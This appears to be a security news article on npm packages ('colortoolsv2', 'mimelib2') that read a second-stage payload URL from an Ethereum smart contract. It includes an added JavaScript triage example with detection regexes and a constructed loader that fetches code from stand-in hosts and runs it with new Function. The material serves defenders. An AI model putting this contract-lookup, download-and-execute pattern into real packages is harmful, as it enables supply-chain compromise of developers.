Hackers Use Ethereum Contracts to Hide Malware in Open-Source Libraries

Attackers are using Ethereum smart contracts to hide the delivery infrastructure of malicious open-source packages, which makes the packages harder to detect and the campaign harder to take down. Research by ReversingLabs shows that the contracts hold the attackers' command-and-control information, namely where the next stage is to be fetched from: the package itself carries no malicious URL, only the logic to ask the blockchain for one. It is a further sign of blockchain infrastructure being adopted as a tool of cybercrime. 🔒

In this campaign the attackers targeted npm (the Node Package Manager), the registry for JavaScript packages, publishing the packages ‘colortoolsv2’ and ‘mimelib2’ as carriers of the malicious code.

Instead of embedding a malicious link directly, the packages contain obfuscated scripts that query an Ethereum contract and read the payload location from it. Because no hard-coded malicious domain appears in the package, scanners that look for known-bad URLs find nothing, and the lookup itself is just a read request to public blockchain infrastructure. 🕵️‍♂️

The retrieved location is then used to download second-stage malware components. Because the URL lives in contract state rather than in the package, the attacker can point installed copies at a new host by updating the contract, without changing the npm package itself, so a takedown of one payload host does not require republishing the package. In addition, fake GitHub repositories padded with fabricated stars and commits were used to lure developers into adopting these packages.
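To make the contract lookup and the second-stage fetch described above concrete, here is an added example that is not ReversingLabs' analysis or the packages' own code. It shows two things an analyst wants when triaging such a package: decoding the ABI-encoded string that an `eth_call` returns, so a captured JSON-RPC response can be turned back into the URL the package would fetch, and a small static check that flags the indicators of this pattern in package source before `npm install` runs it. The RPC endpoint, contract address, sample source and sample response are constructed for illustration and are not the real campaign's values.

```javascript
// Added example (not the packages' own code nor ReversingLabs' tooling).
// Triage helpers for an npm package suspected of reading its payload URL
// from an Ethereum contract. Plain Node.js, no dependencies.

// An ABI-encoded `string` return value is: a 32-byte offset to the data,
// a 32-byte byte length, then the UTF-8 bytes right-padded to 32 bytes.
function encodeAbiString(str) {
  const bytes = Buffer.from(str, "utf8");
  const word = (n) => n.toString(16).padStart(64, "0");
  const hex = bytes.toString("hex");
  const padded = hex.padEnd(Math.ceil(hex.length / 64) * 64, "0");
  return "0x" + word(32) + word(bytes.length) + padded;
}

// Inverse of the above: apply it to the `result` field of an eth_call
// JSON-RPC response captured from the package's network traffic.
function decodeAbiString(hexData) {
  const hex = hexData.startsWith("0x") ? hexData.slice(2) : hexData;
  if (hex.length < 128) throw new Error("too short for an ABI-encoded string");
  const offset = parseInt(hex.slice(0, 64), 16) * 2; // bytes -> hex chars
  const length = parseInt(hex.slice(offset, offset + 64), 16) * 2;
  const body = hex.slice(offset + 64, offset + 64 + length);
  if (body.length !== length) throw new Error("truncated ABI-encoded string");
  return Buffer.from(body, "hex").toString("utf8");
}

// Pull the payload URL out of a raw JSON-RPC response body.
function payloadUrlFromRpcResponse(jsonText) {
  const msg = JSON.parse(jsonText);
  if (msg.error) throw new Error(`RPC error: ${msg.error.message}`);
  return decodeAbiString(msg.result);
}

// Static indicators of the pattern. None is malicious on its own; all of
// them inside an install hook of a "color tools" library is what warrants
// a closer look before the package is allowed to run.
const INDICATORS = [
  { name: "eth_call JSON-RPC method", re: /["']eth_call["']/ },
  { name: "web3/ethers import", re: /require\(["'](web3|ethers)["']\)|from\s+["'](web3|ethers)["']/ },
  { name: "contract address literal", re: /\b0x[0-9a-fA-F]{40}\b/ },
  { name: "eval/Function on fetched data", re: /\b(eval|new Function)\s*\(/ },
];

function scanForChainIndicators(source) {
  return INDICATORS.filter((i) => i.re.test(source)).map((i) => i.name);
}

// Constructed sample in the shape of such a downloader (not the real
// colortoolsv2 code): read a string from a contract, fetch what it names,
// run the result.
const SAMPLE_SOURCE = [
  'const CONTRACT = "0x1111111111111111111111111111111111111111";',
  'const body = { jsonrpc: "2.0", id: 1, method: "eth_call",',
  '  params: [{ to: CONTRACT, data: "0x" }, "latest"] };',
  'fetch("https://rpc.example.invalid", { method: "POST", body: JSON.stringify(body) })',
  "  .then((r) => r.json()).then((j) => fetch(decode(j.result)))",
  "  .then((r) => r.text()).then((code) => new Function(code)());",
].join("\n");

// Constructed RPC response, as if captured from the sample's first request.
const SAMPLE_RPC_RESPONSE = JSON.stringify({
  jsonrpc: "2.0",
  id: 1,
  result: encodeAbiString("https://cdn.example.invalid/stage2.js"),
});

console.log("indicators:", scanForChainIndicators(SAMPLE_SOURCE));
console.log("payload URL:", payloadUrlFromRpcResponse(SAMPLE_RPC_RESPONSE));
```

The scanner is deliberately narrow: a legitimate web3 library will trip the import and address indicators, so the signal is the combination with an install-time hook and with code that executes what it downloads, not any single match. The decoder is what turns a blockchain read observed in a sandbox into the actual second-stage URL for blocking and hunting.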

The two packages are one instance of a broader campaign rather than a one-off. Fake repositories such as ‘solana-trading-bot-v2’ tried to gain credibility through automated commits and staged community activity, while spreading the malware across multiple projects by rotating the malicious dependency under different names.

The campaign is concerning on two counts: it abuses trusted platforms, npm and GitHub, to distribute malicious code, and the blockchain lookup gives the attacker a hosting layer that cannot be seized or sinkholed the way a domain can, only read from. Defenders should treat an npm package that contacts an Ethereum RPC endpoint during installation, or that executes code it has just downloaded, as suspicious regardless of how popular its GitHub repository appears, and the technique is likely to recur.